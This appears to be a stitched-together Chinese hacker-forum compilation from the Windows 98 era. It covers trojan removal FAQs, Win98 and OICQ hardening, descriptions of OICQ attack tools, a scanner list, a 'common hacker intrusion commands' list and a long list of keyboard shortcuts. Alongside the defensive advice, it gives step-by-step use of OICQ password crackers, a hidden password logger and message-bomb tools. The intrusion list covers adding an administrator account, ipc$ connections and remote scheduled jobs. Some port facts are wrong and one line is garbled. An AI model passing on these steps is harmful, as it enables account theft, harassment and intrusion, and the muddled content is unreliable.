与所有的特洛伊木马程序一样,当“冰河”的服务器端程序G_Server.exe一旦被某台电脑的使用者所执行,虽然在表面上看不出任何变化,但事实上,该服务器端程序已悄悄地进驻该机的注册表,以后,只要这台电脑一启动上网,可怕的“后门”(默认端口号7626)就会悄然洞开,可轻易地被藏在网络某个角落的客户端程序G_Client.exe扫描到并实施包括可显示系统信息及上网密码、系统控制(重新启动、关机等)、注册表键值读写等几乎是全方位的控制。
如果上网时一旦不小心误入了“冰河”,脱身的方法如下:
1.在c:\Windows\system目录下,查找并删除名为KERNEL32.EXE的文件。
2.“冰河”为了进行自我保护,它可将自己与文本文件关联,以便在程序被删除后在打开文本文件的时候又自动恢复,这个关联文件是SYSEXPLR.EXE。
3. 检查注册表。在“开始—运行”里输入“regedit”并回车,在“HKEY_LOCAL_MACHINE\
Software\Microsoft\Windows\CurrentVersion
\Run和HKEY_LOCAL_MACHINE\Software\
Microsoft\Windows\CurrentVersion\RunServices”,查找并删除有KERNEL32.EXE文件的键值。
4.最后,因为“冰河”的服务器端程序名不一定就是KERNEL32.EXE,所以最可靠的办法还是把C盘格式化后重新安装Windows。
什么是GirlFriend,如何清除?
答:GirlFriend属于木马程序。主要是获取目标机的密码等资料,另还可以传送信息、显示bmp图像等。运行了该木马之后,会在HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\RUN下面找到键值名Systemtray,在Windows
下生成一个Wind11.exe文件,并将自身删除,然后修改注册表。
清除方法是删除该木马在注册表中所修改的键值名,再在纯DOS下删除Wind11.
exe。
什么是PortHunter,有何对策?
答:PortHunter占用大量的Socks进行端口搜索,盗用SMTP端口(:119)发E-mail、盗用没有密码的代理端口(:8080)、盗用内部使用的FTP端口(:25)。PortHunter降低局域网的数据传输效率,危害网络安全。对策是对于Novell
的局域网,采用限制指定程序运行的方法;对于其它框架的局域网的用户,则可以在服务器中设定禁止一些黑客程序的运行。
什么是Deep Throat,如何清除?
答:Deep
Throat属于特洛伊木马,功能还不少:可获取密码及系统信息,重启目标机器,将目标机设置成FTP服务器,读写、运行和删除目标机器上的文件,隐藏开始菜单和任务栏,截获屏幕图像等功能。
Deep Throat 2.0被执行后会在注册表HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\RUN下面找到键值名Systemtray,在Windows下生成“Systray.exe”。
清除方法是删除该木马在注册表中的键值,接着在纯DOS下删除该木马启动文件。
什么是HDFILL,有何对策?
答:HDFILL属于特洛伊木马程序,表面上是个有着可爱画面的安装程序,但是在实际“安装”过程中会自动产生999999999个变长的文件,直到把你的硬盘填满….为止。虽然要清除这么多….文件非常辛苦,但是也只得耐心清除,要不然怎么办,格式化硬盘?对策还是防患于未然,安装LockDown2000来拦截来历不明的软件。
什么是天行刺客,有何对策?
答:运行于Windows
95/98平台的天行刺客通过从路由器中窃取未加密的信息,从而对指定的机器进行监控。你的E-mail、FTP、BBS登录的用户名和密码都会被黑客窃取。对策是尽量少用MS
—DOS下的FTP命令和Windows下的Telnet命令,尽量采用IE这样对你的重要数据进行了加密的浏览器上站。
四、网上防黑术
必须说明,安全防范与攻击破解是相互依存的,我们初步了解黑客软件的攻击原理和手段,是为了更好地进行黑客防范,其中涉及的黑客手段切勿轻易尝试,否则必将受到国家有关的网络安全法规的惩处,一切后果由使用者自负。
如何防止IP的泄露?
答:很多黑客软件都需要先了解对方的IP地址方能发起有效的攻击,为此还出现了类似IPHunter这样的专门用于截获IP地址的工具。显然,要防范黑客的进攻,第一步应该先保护好自己的IP。要想不让对方刺探到我们的真实IP,一个行之有效的方法就是设置并使用具有防火墙作用的代理服务器(Proxy)。我们在通过代理服务器上网的时候,那些“功力”还不是太深厚的黑客通常就只能定位到代理服务器的IP,而无法获得我们的真实IP。
如何让Win98更安全?
答:对普通个人用户来说,Windows
98还是目前最常用的..作系统,但其安全性能比较薄弱,面对潜在的安全隐患,我们可以通过设置登录密码、以及修改注册表里的一些内容,来屏蔽和限制Windows
98系统里的某些敏感功能,限制普通用户的系统使用权限,以提高上网的安全性。
如何设置系统登录密码?
答:设置登录密码可有效地改善系统的安全性,设置方法如下:首先选择“开始”→“设置”→“控制面板”→“密码”,在随后出现的“密码属性”对话框里,在“更改密码”标签下,点击“更改Windows密码”设置新的系统登录密码,当出现“成功更改了Windows密码”提示后,按“确定”退出。接着打开“用户配置文件”标签,选择“用户可自定义首选项及桌面设置…”,完成后按“确定”退出。
重新启动系统,会出现密码输入框,需要正确输入密码方可正常登录。
如何请不速之客吃闭门羹?
答:要谢绝不速之客以默认配置造访我们的Win98系统
,可在每天离开系统前做如下的修改:在“开始”→“运行”里输入“regedit”,然后按“确定”,打开Win98注册表,在“\HKEY_USERS\.Default\Software\Micorosoft\
Windows\CurrentVersion\Run”中单击鼠标右键,选择“新建”—“字符串值”,将该字符串值命名为“你是非法用户吧?哈哈”,将该键值设为“RUNDLL.EXE
user.exe,exitwindows”。这样,当不速之客想要“光临”我们的Win98系统时,电脑将会执行自动关机..作。
如何屏蔽注册表编辑器?
答:通过修改文件注册表,可以根据需要限制普通用户的系统使用权限:为了防止黑客修改注册表,可做如下的修改:在“开始”→“运行”里输入“regedit”,然后按“确定”,打开Win98注册表,在“\HKEY_CURRENT_USER\Software\
Micorsoft\Windows\CurrentVersion\Policies\System”中,选择“新建”→“DWORD值”“DisableRegistryTools”,将其键值设置为“1”。
如何隐藏驱动器?
CurrentVersion\Policies\Explorer”中,选择“新建”→“二进制值”,取名为“NoDrives”,若将其值设为00000000(由四个字节组成),则表示任何驱动器都不隐藏,该值每个字节的第一位对应从A:到Z:的一个驱动器盘符,即01为A,02为B,04为C,08为D……
比方:需要把D盘隐藏起来,则将该键键值设为08000000。
如何屏蔽MS DOS方式?
答:当我们用上一步中的方法隐藏了驱动器后,如果普通用户选择使用MS
DOS方式,那么他还是可以进入任何驱动器的,所以还应该考虑屏蔽MS
DOS方式:启动注册表,在“\HKEY_ CURRENT_USER\Software\Micorsoft\Windows\
CurrentVersion\Policies”中新建“WinOldApp”主键,在其下新建一个DOWRD值“Disabled”,键值设置为“1”。
问:如何隐藏桌面上所有图标? 答:启动注册表,在
“\HKEY_CURRENT_USER\Software\Micorsoft\
Windows\CurrentVersion\Policies\Explorer”中,选择“新建”——“DOWRD值”,取名为“NoDesktop”,键值设置为“1”,重新启动系统后,普通用户桌面上的图标就统统消失了。
如何隐藏密码文件?
答:
在Win98中,用户设置的拨号上网等密码都是以.pwl文件的形式保存在Window目录中,这样,一个侵入你系统的人是很容易找到该.pwl文件的。所以,应该把这个密码文件尽快隐藏起来:在C盘的WIndows目录下找到并打开System.ini文件,在其中找到[Password
Lists]项,将密码文件的存放路径改到刚才隐藏起来的驱动器下的目录中,这样你的密码文件就相对安全多了。
如何让ICQ更安全?
答:广受欢迎的网络寻呼软件ICQ具有功能齐全、稳定性好等特点,但是它存在着一些安全上的漏洞。虽然现有的这些漏洞还不至于使ICQ用户的本地数据受到直接损失,但是却可能使我们在网上受到一些别有用心的人的攻击,为有效地避免这种烦恼,可以采取以下的措施来进行一定程度上的防御(以ICQ2000a为例):
1.提高ICQ的安全级别 单击“ICQ”按钮,打开菜单,在“Security &
Privacy”栏里找到“Security
level”(安全级别)项,将其设置为“High”(高)。
2.对特定的人“隐身”
如果不希望某人看到你在线,可以这样做:对ICQ的列表中对该人的名字单击左键,在弹出的菜单中选择“Alert/Aeceptmodes”项,在“Status”(状态)标签里“Invisible
To user”(对该人“隐身”)前的复选框里打勾。
3.保护好自己的IP
自己的IP一旦暴露,对方就可以很容易地使用类似ICQBomber(160KB)的攻击性很强的IP炸弹对你进行“轰炸”。比较简单的保护措施如下:
(1)在“Security & Privacy”的“General”标签中,把“Change Contactlist
Authorization”设置为“My authorization is
required…”,设定只有经过你自己同意,别人才能把你添加到列表中。同时,打开“Invisible”标签,通过设置,让某些特定的人看不到我是否在线。
(2)对于2000a以前的版本,可以按“ICQ”按钮,在ICQ菜单里的“Security &
privacy”项中选“Do not allow
others to see my IP
address”(不允许别人查看我的IP地址)。另外,在“Preferences”(设置)中的Contact
list(联系列表)选择“Show Online Only Tab in the
Contact”,这样可以使只有在你列表上的人才能看到你在线。
在ICQ中如何使用SOCK代理服务器?
答:使用SOCK代理服务器也是避免骚扰的一个有效方法。在ICQ中的设置方法如下:在“My Contact
List”(我的联系名单)中把ICQ由“Simple Mode”(简单模式)切换为“Adeanced
Mode”(高级模式)。接着单击“ICQ”按钮,在弹出的菜单里选择“Preferences”(性能设置),选择左侧的“Connections”(连接)一项,将其中的“Server”(服务器)标签下的“Proxy
Settings”(代理服务设置)里选择“Using Firewall—Using
Proxy”,并在“Proxy”里选择SOCK5代理服务器;再选中“Firewall”(防火墙)标签,选择“SOCK5”代理服务器,然后在右边的“Proxy
Server”里把你的SOCK代理服务器地址填入Host框,Port框中填写端口(通常为1080)。最后,在“User”标签下选中“Using
Proxy”,类型选择“SOCK5”。最后单击“Apply”(应用)按钮后按“确定”就可以了。
目前主要有哪些OICQ恶意攻击软件?
答:国产网络寻呼软件OICQ虽然在功能和稳定性上暂时还无法和ICQ相提并论,但是亲切的全中文的界面还是吸引了越来越多的国内用户。随着用户数量的急剧上升,各类针对OICQ的恶意攻击软件也开始纷至踏来,它的安全性也..益受到挑战。
目前比较功能较强的常见恶意攻击软件主要:OICQ Send、网络追捕、OICQ Sniffer、OICQ Nuke
Plus、OICQ
密码终结者、OICQ Spy、OICQ好友炸弹、OICQPASS、OICQ对话阅读器、OICQPEEP等,简单介绍如下:
(1) OICQ Nuke Plus:极具攻击性的OICQ炸弹,它的主要手段是在短时间内向
指定的OICQ用户发送大量的信息,使对方的OICQ超载从而达到轰炸对方的目的。
(2) OICQ 密码终结者:采用穷举法来窃取OICQ的密码。新版经过优化后密码搜索速度极快,可以达到2万个/秒。
(3) OICQ阅读器:不需任何密码即可直接查看OICQ聊天纪录文件。?
(4)OICQ
Spy:一个非常全面的OICQ攻击性工具,集成了IP及端口地址的查寻、用户地址查寻、显示对方真实上线地址等功能,非常全面,具有较强的杀伤力!
(5)
OICQ对话阅读器:针对本地OICQ的黑客工具,能很容易查看你的OICQ账号、密码和聊天记录,可以说什么秘密都没有了。
(6) OICQPeep: 可以轻易地查出任何一个OICQ用户的在线好友名单和他们的IP地址。
OICQ Send有何特点?
答:OICQ Send是一个利用OICQ发布消息的工具,还可以查找OICQ好友的IP。使用方法十分简单,启动OICQ
Send,将需要发送的OICQ好友的IP地址和端口以及发送内容填入相应的对话框内,按“开始”按钮即可将信息发出,不需要自己的OICQ在线。
要注意的是:在OICQ号的栏目内如果不填如何数值,则程序将自动随机的产生OICQ号,虚拟发送到对方的OICQ的陌生人一栏中,而且每发送一次会更换一个号码!如果填入相应的数值,就可以向该OICQ号码用户发送信息,但最多只能发送8条记录。作者为了避免产生不良影响,特别将发送次数限制在每次20条。另外,在发送内容中填写的字符不能超过1000个,否则会产生系统缓冲溢出。
OICQ Sniffer有何特点?
答:OICQ Sniffer是用于破解OICQ密码的UDP协议嗅探器,目前只能够支持Win
9x系列。该软件针对OICQ的消息协议进行了优化,可以探测到OICQ点对点的通信情况。软件启动后的界面十分简洁、明快。用户只要选择上网方式后按下追踪按钮,便可以查看主界面中显示的内容。
OICQ 密码终结者有何特点?
答:利用OICQ密码终结者可以帮助你快速找回6位的OICQ密码(或者说是采用穷举法暴力破解本地机器上OICQ密码的老牌工具),比以前的密码查找软件OICQPass在功能上前进了一步。
完成安装后启动OICQ密码终结者,可以看到它有一个简单而实用的工作界面。使用的方法是先选择用户搜索用到的字符集,然后在选项前面的复选框里打钩;然后选择自己的想要搜索密码的起止位数,最后选择OICQ的解密目录。例如:你的OICQ目录是c:\program
files\oicq,你要解密的OICQ号是123456,那么你应该选择的解密目录就是:c:\program
files\oicq\123456。点击“开始”,立即开始查找OICQ密码,可以观察到工作进度。
什么是OICQPassSniff?
答:OICQPassSniff是一个近乎于“木马”性质的工具,用于破解本机的OICQ密码,只能在Windows
9x下使用。执行程序后没有任何界面出现,程序在后台不露声色地自动运作。最好是手动设置为在Windows启动后自动运行,以后每当有用户登录OICQ时,所有的密码都会被记录在c:\log.txt文件里。
何为OICQ好友炸弹?
答:OICQ好友炸弹是专门对那些在OICQ加入好友时需要身份验证的人进行恶作剧的小工具。填写OICQ服务器名称或IP地址、自己及对方的OICQ号码、请求信息的内容和发送次数,然后点击“开始”,你设置好的骚扰信息就会向陌生人的OICQ发起狂轰滥炸……另外,在进行攻击之前,点击“他的资料”就能查看对应号码用户的所有资料,以保证自己不会随便乱炸。对付这个恶作剧工具的方法是:在OICQ中修改用户资料,在“网络安全”标签中把“身份验证”级别定在“不允许任何人把我列为好友”。这样,你的好友将全部由自己来添加,但却会失去一些广交朋友的机会。
什么是XOICQ?
答:XOICQ是一个查OICQ好友IP以及进行炸弹攻击的二合一OICQ攻击工具。
使用时启动软件,先在根据自己的上网方式在“Adaptor”里选择正确的适配器(否则程序无法继续执行并可能死机),接着点击
“Detect”按钮,截获的对象资料将显示在“在线名单”“List on line”里面。最后选择对象,点击“Add in
attack”,把它添加到攻击对象名单里,然后按“Attack”开始发起攻击。
OICQPeep有何特点?
答:OICQPeep运行于Win98/NT,用于查看OICQ上聊天对象的IP地址,该程序短小精悍且无须特别安装。第一次启动OICQPeep时,在弹出的窗口里选择的上网类型、默认端口号,再填入自己OICQ号码即可。先启动你的OICQ,再运行OICQPeep,然后再按下OICQ的显示按钮,此时你的OICQ在线好友列表里的OICQ号码及其IP地址便就会显示在右边的文本框里。用OICQPeep
来查找IP地址比传统的NETXRAY更为简单、实用,无须发送消息给对方。
网络追捕有何特点?
答:网络追捕是一个针对OICQ的黑客软件。可以查询对方IP的域名,可以设置智能追捕功能,在激活追捕时可以自动从剪贴板上取出IP地址进行查询;可以把查询结果隐藏在系统任务栏中;可以分析一些IRC服务器为了保护聊天者而虚设的IP地址等。第一次启动网络追捕会弹出一个很简洁的提示菜单,根据需要选择执行的..作后,点击一下菜单上的追捕按扭即可。
OICQSpy有何特点?
答:
OICQSpy是一个重量级的OICQ工具。利用它不仅可以监视对方的IP和端口地址,显示对方的上网真实地址和上线时间,而且还可以发送匿名信件;扫描指定计算机的NetBIOS信息。另外,它还可以过滤OICQ炸弹;
软件安装完成后运行OICQSpy.exe,首次运行该程序时会自动弹出一个设置对话框。将其中的OICQ服务器地址设为202.103.190.46,端口设为8000即可。代理端口可任意设置(最好大于1024),
选择IP数据库的路径时可设置为OICQSpy自带的wry.d11。
启动OICQ后,更改系统设置中的网络设置,将上网类型设置为“局域网接入Internet”,用户类型为“Internet用户”,服务器地址设置为“127.0.0.1”,然后点击“添加到列表”,端口号应为前面设置的OICQSpy的代理端口。完成上述设置后,OICQSpy主窗口中将列出所有在线好友的IP、端口、真实地址、上线时间等各种信息。
使用OICQSpy后,由于OICQ的信息要通过代理服务器传送,所以起到了保护自己IP不被OICQPeep这样的工具探查,从而避免OICQ炸弹的袭击。
OICQ ShellTools有何特点?
答:该软件的功能与OICQSpy比较接近,
利用这个软件可以查出自己OICQ好友的IP地址;配合网络追捕的数据库,不仅可以知道对方的地址,甚至还可以冒充其它人发言。安装好OICQ
ShellTools软件后,首先启动自己的OICQ,然后离线,然后再启动OICQ
ShellTools,按照提示填上号码、密码,然后点击“OK”,OICQ好友的秘密就都将呈现眼前。如果想要匿名发送,只需要填上号码和对方的IP地址、端口地址,然后选择发送即可。
如何提高OICQ的安全性?
答:(1)尽量使用最新版本的OICQ软件,因为新版本不仅修改了旧版中的各种BUG,而且往往更稳定快速(最近修改了通讯底层协议的Build
0820版就一个典型的例子)。重要的是,原来针对旧版的OICQ黑客软件,面对时新版往往无能为力。
(2)如果是在网吧或机房等公共场合上网运行OICQ结束后,找到OICQ的安装目录,将以你的OICQ号码命名的那个子目录删除,并随即清空回收站,就可以避免密码被盗和记录被别人偷看了。
(3)使用OICQShield之类的OICQ“盾牌”软件,能够使你避免遭受OICQ Nuke之类OICQ炸弹的攻击。
(4)如果可能的话,使用个人防火墙。单击“OICQ”按钮,选择“系统参数”,进入“网络设置”标签,在“使用ProxySocket5
防火墙”,并填入防火墙的地址和端口号就可以了。另外,在“本地安全”标签里,还可“启用本地消息加密”。
为什么要提防CGI?
答:我们平时上网用的IE等浏览器大都支持CGI、JAVA、ASP等技术。一些别有用心的人利用系统存在的漏洞编写出一些特殊的代码,当你打开包含这些代码的页面时,该代码就会被浏览器自动执行并产生破坏作用。其中典型的恶作剧代码——“窗口炸弹”,包含这一代码的页面被打开后,就会迅速自动打开无数个浏览器窗口,直至你的系统资源被彻底耗尽!另外一种代码则更为阴险,包含了该种代码的页面一旦被打开后,就会自动寻找本机的密码文件并发回服务器。
有效的防范方法是使用防火墙、避免访问来历不明的站点,增强网络管理级别,尽量避免CGI等代码的自动运行。
怎样防止电子邮件炸弹的攻击?
答:1.
不要轻易向别人透露自己的ISP电子邮箱,可根据用途多申请几个163、263这样的免费邮箱,以方便对外联系时使用。
2.一般ISP邮箱或163、263免费邮箱都具有邮件过滤器系统,提供邮件拒收功能。这个功能可以帮助我们把那些令人讨厌的….信件自动退回。只要在邮箱的服务器端设置好就行了。同时你还可以设置具体的过滤规则,同时关闭邮件的自动回复功能。
3.对于使用Foxmail的用户,如果意外遭到电子邮件炸弹的的袭击,可以利用Foxmail的远程邮箱管理功能(在菜单里选“工具”——“远程邮箱管理”),先不会把信件直接从主机上下载,而只是先取包括了它包含了信件的发送者,信件的主题等信息的所有邮件头信息,用“view”功能检查头部信息,看到信件中的不速之客后,可直接使用删除命令把它从主机服务器端直接删除掉。
4.如果你的电子邮箱支持POP3,邮箱被炸后你也可以采用专门的砍信软件(如E-mail
Chomper等)来处理,可以高速删除大量的….信件。
五、网上安全策略
信息的全面数字化和电子网络的四通八达,突破了时空的阻隔,使得当今世界正朝一个电子化的“e—World”逐渐演进,依靠电脑网络,就可以运筹帷幄、决胜于千里之外。然而,这一切都必须建立在良好的网络发展环境和安全的网络运作基础之上。
各种黑客程序虽然功能强大,但并不可怕。只要我们作好相应的防范工作,上网时又能独善其身,这样就可以大大降低被黑客攻击的可能性:
1.重要数据常备份 确保重要数据不被破坏最好的办法是定期或不定期的备份工作,
如硬盘分区表、系统注册表、WIN.INI和SYSTEM.INI等。特别重要的文件应该每天备份。
2.不运行来历不明的软件
我们知道,黑客的服务器程序必须被植入目标计算机系统方能发挥作用,所以我们就不要轻易运行从陌生的不可靠的Internet网站(特别是某些黑客站点)、不可靠的FTP站点上下载的软件,因为黑客软件可以被十分容易地捆绑到任何一个可执行程序上,运行又无法发觉,当你接受到一个来历不明的软件,就有可能包含了后门程序。攻击者常把后门程序换一个名字作为E-mail附件发给你,并骗你说:“我不知道这个软件怎么用,请帮我试一下”之类的话,这时一定不要上当!其他的程序比如游戏软件、屏幕保护程序、新年贺卡程序都很有可能携特洛伊木马进驻你的电脑,所以千万不要运行来历不明的软件。另外,盗版光盘上的许多黑客工具也是暗藏玄机,别轻易中招喔。
3.使用反黑客软件
尽可能经常性地使用多种最新的、能够查解黑客的杀毒软件(或可靠的反黑客软件)来检查系统。必要时应在系统中安装具有实时检测、拦截、查解黑客攻击程序的工具。应该注意的是,与病毒不同,黑客攻击程序不具有病毒传染的机制,因此,传统的防病毒工具未必能够防御黑客程序。另外防火墙也是抵御BO2K等黑客程序入侵的非常有效的手段。
4.防人之心不可无
要时刻保持警惕性,例如,不要关闭浏览器的数据传输提示窗,许多上网的用户都设置为“以后不再询问此类问题”,这样容易失去警觉,越来越大胆地访问、下载和在WEB上回答问题。
最好关闭浏览器的“接受Cookie”——不管是在IRC或是访问别人的网站,
因为没人能保证它给你的那几十个或几百个字节的Cookie
是出于一片好心。上网觉得不对劲时(比如程序自动运行、频繁的死机),应该立刻断线下网,用我们刚才说过的多种方法进行安全检查,看看是否已经被黑客的特洛伊木马进攻了。
5.不要暴露自己的IP 上网注意不要把自己的IP显示出来。某些聊天室会把你聊天用的密码写入你的缓存里面,
自己最好每次清理你的缓存(WINDOWS目录下的Internet Temp文件夹),删掉那些文件名含有自己密码的文件。
总之,对于个人用户而言,要提高上网时的安全性,除了独善其身,做到不访问黑客站点、不运行来历不明的软件,并对系统进行一定的安全性设置外,还有一个很有效的防范措施就是安装使用个人防火墙。对此,我们稍后将做详细的介绍
优秀扫描工具集中营
nMAP :世界上最受黑客欢迎的扫描器,能实现秘密扫描、动态延迟、重发与平行扫描、欺骗扫描、端口过滤探测、RPC直接扫描、分布扫描等,灵活性非常好,功能强大 。 官方主页http://www.insecure.org/nmap/
SATAN 扫描器的鼻祖,它采用Perl写的内核,通过PERL调用大量的C语言的检测工具对目标网站进行分析,因此可以嵌入浏览器中使用。
X-scan 国内著名网络安全站点-安全焦点的牛人 glacier [冰河作者,也是知名女黑客wollf的好老公~~:P] 的作品,个人认为作为纯粹的扫描器来说此物胜于小榕的流光。随着版本号提升,性能也越来越优秀,颇有实力和发展潜力的宝贝! 好话不多说,请直接去焦点DOWN! www.xfocus.net
流光 不得不承认这个程序是国内顶尖的扫描工具,整和了强大的破解和攻击成份。不过由于它的封装性太高,不适合学习技术,小榕主页 www.netxeyes.com
ISS ISS公司开发和维护商业性质的漏洞扫描程序,第一个可公开得到的多层次扫描器[虽然不**],可移植性和灵活性都很好。
其他还有易于使用的CIS[Cerberus Internet Scanner],17岁天才少年开发的基于UNIX的扫描器-Nessus ;俄罗斯程序员开发的SSS, 还有其他各类有特色的扫描器,种类繁多,在此不一一介绍了。
黑客常用的命令和快捷键
黑客入侵中常用的命令:
*net user 查看用户列表
*net user 用户名 密码 /add 添加用户
*net user 用户名 密码 更改用户密码
*net localgroup administrators 用户名 /add 添加用户到管理组
*net user 用户名 /delete 删除用户
*net user 用户名 查看用户的基本情况
*net user 用户名 /active:no 禁用该用户
*net user 用户名 /active:yes 启用该用户
*net share 查看计算机IPC$共享资源
*net share 共享名 查看该共享的情况
*net share 共享名=路径 设置共享。例如 net share c$=c:
*net share 共享名 /delete 删除IPC$共享
*net use 查看IPC$连接情况
*net use \\ip\ipc$ “密码” /user:”用户名” ipc$连接
*net time \\ip 查看远程计算机上的时间
*copy 路径:\文件名 \\ip\共享名 复制文件到已经ipc$连接的计算机上
*net view ip 查看计算机上的共享资源
*ftp 服务器地址 进入FTP服务器
*at 查看自己计算机上的计划作业
*at \\ip 查看远程计算机上的计划作业
*at \\ip 时间 命令(注意加盘符) 在远程计算机上加一个作业
*at \\ip 计划作业ID /delete 删除远程计算机上的一个计划作业
*at \\ip all /delete 删除远程计算机上的全部计划作业
珍藏的最全的windows操作系统快捷键
一、常见用法:
F1 显示当前程序或者windows的帮助内容。
F2 当你选中一个文件的话,这意味着“重命名”
F3 当你在桌面上的时候是打开“查找:所有文件” 对话框
F10或ALT 激活当前程序的菜单栏
windows键或CTRL+ESC 打开开始菜单
CTRL+ALT+DELETE 在win9x中打开关闭程序对话框
DELETE 删除被选择的选择项目,如果是文件,将被放入回收站
SHIFT+DELETE 删除被选择的选择项目,如果是文件,将被直接删除而不是放入回收站
CTRL+N 新建一个新的文件
CTRL+O 打开“打开文件”对话框
CTRL+P 打开“打印”对话框
CTRL+S 保存当前操作的文件
CTRL+X 剪切被选择的项目到剪贴板
CTRL+INSERT 或 CTRL+C 复制被选择的项目到剪贴板
SHIFT+INSERT 或 CTRL+V 粘贴剪贴板中哪谌莸降鼻拔恢?
ALT+BACKSPACE 或 CTRL+Z 撤销上一步的操作
ALT+SHIFT+BACKSPACE 重做上一步被撤销的操作
Windows键+M 最小化所有被打开的窗口。
Windows键+CTRL+M 重新将恢复上一项操作前窗口的大小和位置
Windows键+E 打开资源管理器
Windows键+F 打开“查找:所有文件”对话框
Windows键+R 打开“运行”对话框
Windows键+BREAK 打开“系统属性”对话框
Windows键+CTRL+F 打开“查找:计算机”对话框
SHIFT+F10或鼠标右击 打开当前活动项目的快捷菜单
SHIFT 在放入CD的时候按下不放,可以跳过自动播放CD。在打开word的时候按下不放,可以跳过自启动的宏
ALT+F4 关闭当前应用程序
ALT+SPACEBAR 打开程序最左上角的菜单
ALT+TAB 切换当前程序
ALT+ESC 切换当前程序
ALT+ENTER 将windows下运行的MSDOS窗口在窗口和全屏幕状态间切换
PRINT SCREEN 将当前屏幕以图象方式拷贝到剪贴板
ALT+PRINT SCREEN 将当前活动程序窗口以图象方式拷贝到剪贴板
CTRL+F4 关闭当前应用程序中的当前文本(如word中)
CTRL+F6 切换到当前应用程序中的下一个文本(加shift 可以跳到前一个窗口)
在IE中:
ALT+RIGHT ARROW 显示前一页(前进键)
ALT+LEFT ARROW 显示后一页(后退键)
CTRL+TAB 在页面上的各框架中切换(加shift反向)
F5 刷新
CTRL+F5 强行刷新
目的快捷键
激活程序中的菜单栏 F10
执行菜单上相应的命令 ALT+菜单上带下划线的字母
关闭多文档界面程序中的当
前窗口 CTRL+ F4
关闭当前窗口或退出程序 ALT+ F4
复制 CTRL+ C
剪切 CTRL+ X
删除 DELETE
显示所选对话框项目的帮助 F1
显示当前窗口的系统菜单 ALT+空格键
显示所选项目的快捷菜单 SHIFT+ F10
显示“开始”菜单 CTRL+ ESC
显示多文档界面程序的系统
菜单 ALT+连字号(-)
粘贴 CTR L+ V
切换到上次使用的窗口或者
按住 ALT然后重复按TAB,
切换到另一个窗口 ALT+ TAB
撤消 CTRL+ Z
二、使用“Windows资源管理器”的快捷键
目的快捷键
如果当前选择展开了,要折
叠或者选择父文件夹左箭头
折叠所选的文件夹 NUM LOCK+负号(-)
如果当前选择折叠了,要展开
或者选择第一个子文件夹右箭头
展开当前选择下的所有文件夹 NUM LOCK+*
展开所选的文件夹 NUM LOCK+加号(+)
在左右窗格间切换 F6
三、使用 WINDOWS键
可以使用 Microsoft自然键盘或含有 Windows徽标键的其他任何兼容键盘的以下快捷键。
目的快捷键
在任务栏上的按钮间循环 WINDOWS+ TAB
显示“查找:所有文件” WINDOWS+ F
显示“查找:计算机” CTRL+ WINDOWS+ F
显示“帮助” WINDOWS+ F1
显示“运行”命令 WINDOWS+ R
显示“开始”菜单 WINDOWS
显示“系统属性”对话框 WINDOWS+ BREAK
显示“Windows资源管理器” WINDOWS+ E
最小化或还原所有窗口 WINDOWS+ D
撤消最小化所有窗口 SHIFT+ WINDOWS+ M
四、使用“我的电脑”和“Windows资源管理器”的快捷键
目的快捷键
关闭所选文件夹及其所有父
文件夹按住 SHIFT键再单击“关闭按钮(仅适用于“我的电脑”)
向后移动到上一个视图 ALT+左箭头
向前移动到上一个视图 ALT+右箭头
查看上一级文件夹 BACKSPACE
五、使用对话框中的快捷键
目的快捷键
取消当前任务 ESC
如果当前控件是个按钮,要
单击该按钮或者如果当前控
件是个复选框,要选择或清
除该复选框或者如果当前控
件是个选项按钮,要单击该
选项空格键
单击相应的命令 ALT+带下划线的字母
单击所选按钮 ENTER
在选项上向后移动 SHIFT+ TAB
在选项卡上向后移动 CTRL+ SHIFT+ TAB
在选项上向前移动 TAB
在选项卡上向前移动 CTRL+ TAB
如果在“另存为”或“打开”
对话框中选择了某文件夹,
要打开上一级文件夹 BACKSPACE
在“另存为”或“打开”对
话框中打开“保存到”或
“查阅” F4
刷新“另存为”或“打开”
对话框 F5
六、使用“桌面”、“我的电脑”和“Windows资源管理器”快捷键
选择项目时,可以使用以下快捷键。
目的快捷键
插入光盘时不用“自动播放”
功能按住 SHIFT插入 CD-ROM
复制文件按住 CTRL拖动文件
创建快捷方式按住 CTRL+SHIFT拖动文件
立即删除某项目而不将其放入 SHIFT+DELETE
“回收站”
显示“查找:所有文件” F3
显示项目的快捷菜单 APPLICATION键
刷新窗口的内容 F5
重命名项目 F2
选择所有项目 CTRL+ A
查看项目的属性 ALT+ ENTER或 ALT+双击
可将 APPLICATION键用于 Microsoft自然键盘或含有 APPLICATION键的其他兼容键
七、Microsoft放大程序的快捷键
这里运用Windows徽标键和其他键的组合。
快捷键目的
Windows徽标+PRINT SCREEN将屏幕复制到剪贴板(包括鼠标光标)
Windows徽标+SCROLL LOCK将屏幕复制到剪贴板(不包括鼠标光标)
Windows徽标+ PAGE UP切换反色。
Windows徽标+ PAGE DOWN切换跟随鼠标光标
Windows徽标+向上箭头增加放大率
Windows徽标+向下箭头减小放大率
八、使用辅助选项快捷键
目的快捷键
切换筛选键开关右SHIFT八秒
切换高对比度开关左ALT+左SHIFT+PRINT SCREEN
切换鼠标键开关左ALT+左SHIFT+NUM LOCK
切换粘滞键开关 SHIFT键五次
切换切换键开关 NUM LOCK五秒
新手常见问题分析
所谓“林子大了什么鸟都有”。论坛上大家水平参差不齐,有时一个“低层次”的问题高手懒得答,自以为高手的答不好,甚至有人回个伤人的回答,弄的很不愉快。作为一名版主,我要求自己耐心细致尽自己所能地回答问题,但有些问题实在让人上火(也许是我脾气不好吧)。我简单的答(孰我能力有限)他认为版主在敷衍,我语气重了他认为你欺负菜鸟。这个……
发了堆牢骚,其实就是希望大家能相互理解,理解,再理解。
下面进入正题。我看了最近的50几页帖子,归纳出一些常见的问题,然后查找相关的回答,分类记下。再写一些自己的说明,帮助新手理解和快速入门。由于本人水平有限,下面的表述有错误和不足的地方,还请各位高手详细指出。我会立刻修改的。这里的版主认为如果认为有什么地方不妥的,就直接修改吧。如果大家有什么建议也请发短消息或跟帖告诉我。不过这是给新手看的,千万不要要求太高哦。
不该问的问题
简单说明:
我很无奈地吧这条放在了第一位。
相关帖子:
找软件 在这里 华军软件园 http://bj2.onlinedown.net/
找代理 在这里 http://search.lycos.com.cn/dir/Comp…e_Proxy_Server/
http://www8.big.or.jp/~000/CyberSyndrome/psr3.html
找师傅 论坛就是你的“老师”。
找注册码 在这里 http://www.skycn.com/soft/4445.html
关于认证会员和搜索功能
简单说明:
